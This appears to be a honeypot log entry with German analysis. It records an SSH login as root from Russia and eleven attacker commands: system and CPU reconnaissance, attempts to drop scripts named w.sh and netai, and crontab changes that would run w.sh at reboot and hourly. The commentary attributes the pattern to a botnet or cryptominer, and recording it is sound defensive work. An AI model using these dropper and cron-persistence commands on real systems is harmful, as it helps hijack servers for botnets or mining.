04.10.2026, 15:13 UTC · 11 Befehle · über ssh · Russland · 2× wiederholt
user='root' pass='Vk$@+V#e-oSBgIG' root@srv01:~$ uname -a Linux api-01 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:46:11 UTC 2023 x86_64 GNU/Linux root@srv01:~$ sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done' / root@srv01:~$ cat /proc/cpuinfo | grep processor | wc -l 4 root@srv01:~$ cd "/" && if [ ! -f "w.sh" ]; then cat > "w.sh" && chmod +x w.sh; fi bash: w.sh: No such file or directory root@srv01:~$ CRON="$(crontab -l 2>/dev/null || true)" root@srv01:~$ echo "$CRON" | grep -F '//w.sh "astats" "netai" "kstats" "ssh 2 az"' >/dev/null 2>&1 || \ bash: syntax error near unexpected token `||' root@srv01:~$ printf '%s\n%s\n' "@reboot //w.sh "astats" "netai" "kstats" "ssh 2 az"" "0 * * * * cd "/" && ./w.sh "astats" "netai" "kstats" "ssh 2 az"" | (cat -; echo "$CRON") | crontab - bash: syntax error near unexpected token `(' root@srv01:~$ ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10 PID %CPU COMMAND 1234 2.3 python3 5678 1.1 nginx 9012 0.8 sshd 3456 0.5 systemd-journal 7890 0.3 systemd-logind 2345 0.2 cron 6789 0.1 rsyslogd 1111 0.0 bash 2222 0.0 ps 3333 0.0 head root@srv01:~$ ps aux | grep netai | grep -v grep | wc -l 0 root@srv01:~$ cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > netai root@srv01:~$ cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > netai bash: netai: No such file or directory
Der Angreifer meldete sich mit einem generierten Root-Passwort über SSH an. Er prüfte zunächst die Systemumgebung und die CPU-Kapazität. Anschließend versuchte er, ein Skript namens w.sh im Wurzelverzeichnis abzulegen. Danach manipulierte er die Cron-Jobs, um dieses Skript regelmäßig auszuführen. Zuletzt versuchte er, eine Datei namens netai in temporären Verzeichnissen zu erstellen.
uname -a liefert Informationen über das Betriebssystem und die Architektur. Die Schleife sucht nach einem beschreibbaren Verzeichnis für die Ablage von Dateien. cat /proc/cpuinfo zählt die verfügbaren Prozessorkerne. Der Befehl crontab -l liest die bestehenden Zeitpläne, um diese nicht zu überschreiben. Die printf-Anweisung fügt neue Einträge hinzu, die das Skript w.sh bei jedem Neustart und stündlich aufrufen. Die ps-Befehle prüfen, ob bereits ähnliche Prozesse laufen, um Konflikte zu vermeiden.
Das Ziel ist die Installation einer Persistenz-Komponente für ein Botnetz oder einen Kryptominer. Die Verwendung von Cron-Jobs mit spezifischen Parametern wie netai deutet auf eine automatisierte Hintergrundaktivität hin. Die Prüfung der CPU-Kerne ist typisch für Mining-Software, die die Rechenleistung maximieren will.
Dieses Muster ist sehr verbreitet bei automatisierten Botnetzen, die nach schwachen Root-Passwörtern suchen. Die spezifischen Argumente im Cron-Job deuten auf eine bekannte Malware-Familie hin, die oft in Cloud-Umgebungen aktiv ist.